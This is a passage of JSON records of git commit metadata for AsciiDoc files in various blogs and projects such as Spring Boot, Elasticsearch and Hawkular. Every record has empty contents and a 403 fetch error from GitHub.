Option or Either to replace null as a failure indicator.asciidoc","repos":"lancegatlin\/techblog,lancegatlin\/techblog","old_file":"posts\/Scala: Use Option or Either to replace null as a failure indicator.asciidoc","new_file":"posts\/Scala: Use Option or Either to replace null as a failure indicator.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lancegatlin\/techblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d1a9b6baa9eb32feb11e52a1225a014028feeb1","subject":"Update 2016-11-07-Monday.adoc","message":"Update 2016-11-07-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Monday.adoc","new_file":"_posts\/2016-11-07-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"818f2355cf337907c0180045165887d5e8507c72","subject":"finalising your submission","message":"finalising your submission\n","repos":"EMBL-EBI-SUBS\/subs,EMBL-EBI-SUBS\/subs","old_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f13d1ef49703eca1cac5221b3aea9991ee849e9","subject":"Update ipython_post_setup.adoc","message":"Update ipython_post_setup.adoc","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/ipython_post_setup.adoc","new_file":"docs\/ipython_post_setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bf141a3fd18e523e7c32edb0992e2751077e38d2","subject":"[docs] add warning for read-write indices in force merge documentation (#28869)","message":"[docs] add warning for read-write indices in force merge documentation (#28869)\n\n","repos":"gfyoung\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch","old_file":"docs\/reference\/indices\/forcemerge.asciidoc","new_file":"docs\/reference\/indices\/forcemerge.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cca153e986f4ede41c5cca7a24fc0784be9f59f4","subject":"Document how to return custom JSON on errors","message":"Document how to return custom JSON on errors\n\nCloses gh-3999\n","repos":"RichardCSantana\/spring-boot,bbrouwer\/spring-boot,lucassaldanha\/spring-boot,kamilszymanski\/spring-boot,spring-projects\/spring-boot,javyzheng\/spring-boot,mrumpf\/spring-boot,chrylis\/spring-boot,javyzheng\/spring-boot,sebastiankirsch\/spring-boot,lucassaldanha\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,donhuvy\/spring-boot,dfa1\/spring-boot,bclozel\/spring-boot,joansmith\/spring-boot,lenicliu\/spring-boot,habuma\/spring-boot,zhangshuangquan\/spring-root,qerub\/spring-boot,chrylis\/spring-boot,srikalyan\/spring-boot,pvorb\/spring-boot,RichardCSantana\/spring-boot,lexandro\/spring-boot,joshiste\/spring-boot,hello2009chen\/spring-boot,Buzzardo\/spring-boot,shakuzen\/spring-boot,habuma\/spring-boot,hello2009chen\/spring-boot,jayarampradhan\/spring-boot,habuma\/spring-boot,ilayaperumalg\/spring-boot,kdvolder\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,hqrt\/jenkins2-course-spring-boot,brettwooldridge\/spring-boot,srikalyan\/spring-boot,lenicliu\/spring-boot,lburgazzoli\/spring-boot,jmnarloch\/spring-boot,eddumelendez\/spring-boot,kdvolder\/spring-boot,tiarebalbi\/spring-boot,tiarebalbi\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jvz\/spring-boot,xiaoleiPENG\/my-project,Nowheresly\/spring-boot,bclozel\/spring-boot,mosoft521\/spring-boot,michael-simons\/spring-boot,akmaharshi\/jenkins,mbenson\/spring-boot,joshiste\/spring-boot,zhangshuangquan\/spring-root,Buzzardo\/spring-boot,donhuvy\/spring-boot,mdeinum\/spring-boot,habuma\/spring-boot,mrumpf\/spring-boot,afroje-reshma\/spring-boot-sample,philwebb\/spring-boot,mbenson\/spring-boot,joansmith\/spring-boot,shangyi0102\/spring-boot,mdeinum\/spring-boot,chrylis\/spring-boot,joshiste\/spring-boot,deki\/spring-boot,pvorb\/spring-boot,vpavic\/spring-boot,sebastiankirsch\/spring-boot,aahlenst\/spring-boot,bijukunjummen\/spring-boot,izeye\/spring-boot,ollie314\/spring-boot,hqrt\/jenkins2-course-spring-boot,drumonii\/spring-boot,jbovet\/spring-boot,tsachev\/spring-boot,vakninr\/spring-boot,spring-projects\/spring-boot,thomasdarimont\/spring-boot,candrews\/spring-boot,lenicliu\/spring-boot,zhangshuangquan\/spring-root,vpavic\/spring-boot,aahlenst\/spring-boot,xiaoleiPENG\/my-project,spring-projects\/spring-boot,jxblum\/spring-boot,ilayaperumalg\/spring-boot,jbovet\/spring-boot,izeye\/spring-boot,wilkinsona\/spring-boot,minmay\/spring-boot,yhj630520\/spring-boot,chrylis\/spring-boot,ollie314\/spring-boot,izeye\/spring-boot,yangdd1205\/spring-boot,herau\/spring-boot,hqrt\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,jmnarloch\/spring-boot,linead\/spring-boot,bclozel\/spring-boot,isopov\/spring-boot,DeezCashews\/spring-boot,bjornlindstrom\/spring-boot,mbogoevici\/spring-boot,ptahchiev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,srikalyan\/spring-boot,donhuvy\/spring-boot,ollie314\/spring-boot,mdeinum\/spring-boot,shakuzen\/spring-boot,javyzheng\/spring-boot,neo4j-contrib\/spring-boot,qerub\/spring-boot,tiarebalbi\/spring-boot,aahlenst\/spring-boot,minmay\/spring-boot,jbovet\/spring-boot,jbovet\/spring-boot,RichardCSantana\/spring-boot,bjornlindstrom\/spring-boot,lucassaldanha\/spring-boot,felipeg48\/spring-boot,dfa1\/spring-boot,rweisleder\/spring-boot,ameraljovic\/spring-boot,srikalyan\/spring-boot,royclarkson\/spring-boot,dreis2211\/spring-boot,neo4j-contrib\/spring-boot,i007422\/jenkins2-course-spring-boot,dreis2211\/spring-boot,srikalyan\/spring-boot,rweisleder\/spring-boot,sbuettner\/spring-boot,neo4j-contrib\/spring-boot,herau\/spring-boot,mbenson\/spring-boot,bbrouwer\/spring-boot,ameraljovic\/spring-boot,philwebb\/spring-boot-concourse,i007422\/jenkins2-course-spring-boot,mdeinum\/spring-boot,drumonii\/spring-boot,vakninr\/spring-boot,ihoneymon\/spring-boot,lenicliu\/spring-boot,drumonii\/spring-boot,kdvolder\/spring-boot,sbuettner\/spring-boot,isopov\/spring-boot,minmay\/spring-boot,Buzzardo\/spring-boot,qerub\/spring-boot,royclarkson\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,royclarkson\/spring-boot,jbovet\/spring-boot,ihoneymon\/spring-boot,wilkinsona\/spring-boot,kamilszymanski\/spring-boot,ilayaperumalg\/spring-boot,isopov\/spring-boot,michael-simons\/spring-boot,nebhale\/spring-boot,ilayaperumalg\/spring-boot,sbuettner\/spring-boot,herau\/spring-boot,hello2009chen\/spring-boot,wilkinsona\/spring-boot,felipeg48\/spring-boot,deki\/spring-boot,kamilszymanski\/spring-boot,bbrouwer\/spring-boot,thomasdarimont\/spring-boot,mdeinum\/spring-boot,wilkinsona\/spring-boot,DeezCashews\/spring-boot,SaravananParthasarathy\/SPSDemo,SaravananParthasarathy\/SPSDemo,jayarampradhan\/spring-boot,Buzzardo\/spring-boot,joshiste\/spring-boot,lucassaldanha\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,akmaharshi\/jenkins,kamilszymanski\/spring-boot,vpavic\/spring-boot,sbcoba\/spring-boot,thomasdarimont\/spring-boot,spring-projects\/spring-boot,eddumelendez\/spring-boot,kdvolder\/spring-boot,tsachev\/spring-boot,akmaharshi\/jenkins,scottfrederick\/spring-boot,RichardCSantana\/spring-boot,brettwooldridge\/spring-boot,ameraljovic\/spring-boot,javyzheng\/spring-boot,joshiste\/spring-boot,zhanhb\/spring-boot,izeye\/spring-boot,michael-simons\/spring-boot,cleverjava\/jenkins2-course-spring-boot,joansmith\/spring-boot,mbogoevici\/spring-boot,mbenson\/spring-boot,jayarampradhan\/spring-boot,joansmith\/spring-boot,shangyi0102\/spring-boot,bclozel\/spring-boot,scottfrederick\/spring-boot,rweisleder\/spring-boot,hqrt\/jenkins2-course-spring-boot,brettwooldridge\/spring-boot,bjornlindstrom\/spring-boot,candrews\/spring-boot,olivergierke\/spring-boot,akmaharshi\/jenkins,tsachev\/spring-boot,zhanhb\/spring-boot,deki\/spring-boot,i007422\/jenkins2-course-spring-boot,vakninr\/spring-boot,Nowheresly\/spring-boot,mbogoevici\/spring-boot,drumonii\/spring-boot,ollie314\/spring-boot,akmaharshi\/jenkins,pvorb\/spring-boot,sebastiankirsch\/spring-boot,SaravananParthasarathy\/SPSDemo,nebhale\/spring-boot,michael-simons\/spring-boot,tsachev\/spring-boot,chrylis\/spring-boot,afroje-reshma\/spring-boot-sample,bijukunjummen\/spring-boot,philwebb\/spring-boot,jmnarloch\/spring-boot,philwebb\/spring-boot-concourse,ptahchiev\/spring-boot,bbrouwer\/spring-boot,kdvolder\/spring-boot,vakninr\/spring-boot,thomasdarimont\/spring-boot,jxblum\/spring-boot,lexandro\/spring-boot,Nowheresly\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,jvz\/spring-boot,htynkn\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,joshthornhill\/spring-boot,dfa1\/spring-boot,isopov\/spring-boot,RichardCSantana\/spring-boot,eddumelendez\/spring-boot,bijukunjummen\/spring-boot,philwebb\/spring-boot,shangyi0102\/spring-boot,yhj630520\/spring-boot,Nowheresly\/spring-boot,wilkinsona\/spring-boot,sbuettner\/spring-boot,drumonii\/spring-boot,jxblum\/spring-boot,olivergierke\/spring-boot,jayarampradhan\/spring-boot,lburgazzoli\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,i007422\/jenkins2-course-spring-boot,mbogoevici\/spring-boot,ptahchiev\/spring-boot,donhuvy\/spring-boot,mrumpf\/spring-boot,ilayaperumalg\/spring-boot,joansmith\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,sbcoba\/spring-boot,lexandro\/spring-boot,javyzheng\/spring-boot,sbcoba\/spring-boot,shakuzen\/spring-boot,rweisleder\/spring-boot,lucassaldanha\/spring-boot,shakuzen\/spring-boot,ihoneymon\/spring-boot,NetoDevel\/spring-boot,dreis2211\/spring-boot,jmnarloch\/spring-boot,linead\/spring-boot,NetoDevel\/spring-boot,izeye\/spring-boot,hello2009chen\/spring-boot,Nowheresly\/spring-boot,lexandro\/spring-boot,ihoneymon\/spring-boot,rweisleder\/spring-boot,dfa1\/spring-boot,yhj630520\/spring-boot,zhanhb\/spring-boot,linead\/spring-boot,Buzzardo\/spring-boot,spring-projects\/spring-boot,yangdd1205\/spring-boot,bijukunjummen\/spring-boot,zhanhb\/spring-boot,herau\/spring-boot,tsachev\/spring-boot,felipeg48\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,htynkn\/spring-boot,kdvolder\/spring-boot,tsachev\/spring-boot,dreis2211\/spring-boot,ollie314\/spring-boot,Buzzardo\/spring-boot,NetoDevel\/spring-boot,qerub\/spring-boot,joshthornhill\/spring-boot,afroje-reshma\/spring-boot-sample,tiarebalbi\/spring-boot,dreis2211\/spring-boot,afroje-reshma\/spring-boot-sample,donhuvy\/spring-boot,jmnarloch\/spring-boot,mosoft521\/spring-boot,royclarkson\/spring-boot,lburgazzoli\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,qerub\/spring-boot,philwebb\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot,hqrt\/jenkins2-course-spring-boot,habuma\/spring-boot,minmay\/spring-boot,cleverjava\/jenkins2-course-spring-boot,thomasdarimont\/spring-boot,xiaoleiPENG\/my-project,ihoneymon\/spring-boot,candrews\/spring-boot,vpavic\/spring-boot,bjornlindstrom\/spring-boot,sbcoba\/spring-boot,ilayaperumalg\/spring-boot,drumonii\/spring-boot,vpavic\/spring-boot,olivergierke\/spring-boot,linead\/spring-boot,olivergierke\/spring-boot,olivergierke\/spring-boot,ptahchiev\/spring-boot,herau\/spring-boot,pvorb\/spring-boot,mbogoevici\/spring-boot,ameraljovic\/spring-boot,sebastiankirsch\/spring-boot,neo4j-contrib\/spring-boot,htynkn\/spring-boot,NetoDevel\/spring-boot,jvz\/spring-boot,sbcoba\/spring-boot,philwebb\/spring-boot-concourse,chrylis\/spring-boot,NetoDevel\/spring-boot,brettwooldridge\/spring-boot,bclozel\/spring-boot,felipeg48\/spring-boot,htynkn\/spring-boot,felipeg48\/spring-boot,candrews\/spring-boot,cleverjava\/jenkins2-course-spring-boot,nebhale\/spring-boot,zhangshuangquan\/spring-root,SaravananParthasarathy\/SPSDemo,kamilszymanski\/spring-boot,DeezCashews\/spring-boot,jvz\/spring-boot,philwebb\/spring-boot,habuma\/spring-boot,zhangshuangquan\/spring-root,isopov\/spring-boot,deki\/spring-boot,mosoft521\/spring-boot,xiaoleiPENG\/my-project,mbenson\/spring-boot,jvz\/spring-boot,aahlenst\/spring-boot,minmay\/spring-boot,lenicliu\/spring-boot,donhuvy\/spring-boot,DeezCashews\/spring-boot,DeezCashews\/spring-boot,ptahchiev\/spring-boot,spring-projects\/spring-boot,deki\/spring-boot,joshthornhill\/spring-boot,shakuzen\/spring-boot,htynkn\/spring-boot,lexandro\/spring-boot,scottfrederick\/spring-boot,nebhale\/spring-boot,isopov\/spring-boot,joshthornhill\/spring-boot,vakninr\/spring-boot,wilkinsona\/spring-boot,yhj630520\/spring-boot,zhanhb\/spring-boot,tiarebalbi\/spring-boot,SaravananParthasarathy\/SPSDemo,joshthornhill\/spring-boot,cleverjava\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,ihoneymon\/spring-boot,scottfrederick\/spring-boot,dreis2211\/spring-boot,brettwooldridge\/spring-boot,mrumpf\/spring-boot,yangdd1205\/spring-boot,aahlenst\/spring-boot,royclarkson\/spring-boot,bbrouwer\/spring-boot,bjornlindstrom\/spring-boot,mosoft521\/spring-boot,sbuettner\/spring-boot,shangyi0102\/spring-boot,sebastiankirsch\/spring-boot,bijukunjummen\/spring-boot,scottfrederick\/spring-boot,nebhale\/spring-boot,eddumelendez\/spring-boot,mosoft521\/spring-boot,yhj630520\/spring-boot,shakuzen\/spring-boot,felipeg48\/spring-boot,htynkn\/spring-boot,neo4j-contrib\/spring-boot,shangyi0102\/spring-boot,bclozel\/spring-boot,mdeinum\/spring-boot,michael-simons\/spring-boot,zhanhb\/spring-boot,dfa1\/spring-boot,pvorb\/spring-boot,lburgazzoli\/spring-boot,mbenson\/spring-boot,linead\/spring-boot,vpavic\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,mrumpf\/spring-boot,rweisleder\/spring-boot,candrews\/spring-boot,jxblum\/spring-boot,jxblum\/spring-boot,philwebb\/spring-boot-concourse,afroje-reshma\/spring-boot-sample,ameraljovic\/spring-boot,hello2009chen\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8343667b99e6a37462a527010accf8a044a2ffb5","subject":"Announce h-services 0.20 (#249)","message":"Announce h-services 0.20 (#249)\n\n","repos":"pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/11\/09\/hawkular-services-0.20.0.Final.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/11\/09\/hawkular-services-0.20.0.Final.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"be453de7d68f0050b3a39a50447b480ae3a43d69","subject":"Hawkular Metrics 0.13.0 - Release","message":"Hawkular Metrics 0.13.0 - Release\n","repos":"hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/03\/02\/hawkular-metrics-0.13.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/03\/02\/hawkular-metrics-0.13.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e033939e23d7bdc738421c964c212f7c57b286ec","subject":"Update 2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","message":"Update 2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","new_file":"_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1940c75d2768258452bc911c34677e335757808","subject":"Add COMMITTERS.adoc","message":"Add COMMITTERS.adoc\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"COMMITTERS.adoc","new_file":"COMMITTERS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c23436024a6a3dab26fe1d7e03aafadbf92c172c","subject":"Update 2015-10-12-The-Magical-World-of-Software-Defined-Radio.adoc","message":"Update 2015-10-12-The-Magical-World-of-Software-Defined-Radio.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-10-12-The-Magical-World-of-Software-Defined-Radio.adoc","new_file":"_posts\/2015-10-12-The-Magical-World-of-Software-Defined-Radio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f787b445b61ecfb8dd7f1a452002973ac290b782","subject":"Update 2016-04-17-Nuevo-post.adoc","message":"Update 2016-04-17-Nuevo-post.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2016-04-17-Nuevo-post.adoc","new_file":"_posts\/2016-04-17-Nuevo-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71847406c2b90cde764925c9ab6378577a4c90d7","subject":"y2b create post Megapixel Madness! (Nokia Lumia 1020 Unboxing \\u0026 Camera Test)","message":"y2b create post Megapixel Madness! (Nokia Lumia 1020 Unboxing \\u0026 Camera Test)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-11-Megapixel-Madness-Nokia-Lumia-1020-Unboxing-u0026-Camera-Test.adoc","new_file":"_posts\/2013-09-11-Megapixel-Madness-Nokia-Lumia-1020-Unboxing-u0026-Camera-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8e344af5b8f2a7ca4757f5e95b153301a7de8e9","subject":"Publish 2016-12-1-re-Invent2016.adoc","message":"Publish 2016-12-1-re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-1-re-Invent2016.adoc","new_file":"2016-12-1-re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09996ee6bce691af0857d85bbdf62ceae61df3dc","subject":"Update 2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","message":"Update 2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","new_file":"_posts\/2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8caf94e41002830501a0fb6a50688b77f271d888","subject":"y2b create post GLIF Tripod Mount \\u0026 Stand for iPhone 4 \\\/ 4S Review","message":"y2b create post GLIF Tripod Mount \\u0026 Stand for iPhone 4 \\\/ 4S Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-28-GLIF-Tripod-Mount-u0026-Stand-for-iPhone-4--4S-Review.adoc","new_file":"_posts\/2011-11-28-GLIF-Tripod-Mount-u0026-Stand-for-iPhone-4--4S-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af46f6e5b176ad2582985af8c58484f707f8cbdd","subject":"Update 2017-01-25-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc","message":"Update 2017-01-25-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2017-01-25-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc","new_file":"_posts\/2017-01-25-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"333d253173d96c2c3db29d70c597317c477f070d","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"609f5b94c9267759d55beddfc6ac911780e0ed35","subject":"Update 2017-03-31-Linux-kill-process-by-user-executable.adoc","message":"Update 2017-03-31-Linux-kill-process-by-user-executable.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-31-Linux-kill-process-by-user-executable.adoc","new_file":"_posts\/2017-03-31-Linux-kill-process-by-user-executable.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db5045c22cd0b8d8988a760eb6819c58e6e27489","subject":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-23-3UniqueGadgetsYouWouldntExpectToExist.adoc","new_file":"_posts\/2018-02-23-3UniqueGadgetsYouWouldntExpectToExist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e46badffdb15d083714101783fae78fce8fa680","subject":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","message":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e51661fdea5df9c67ed73296bd2ad33199675b0","subject":"y2b create post 4K Surround Gaming Setup With 4 NVIDIA Titans! (CES 2014)","message":"y2b create post 4K Surround Gaming Setup With 4 NVIDIA Titans! (CES 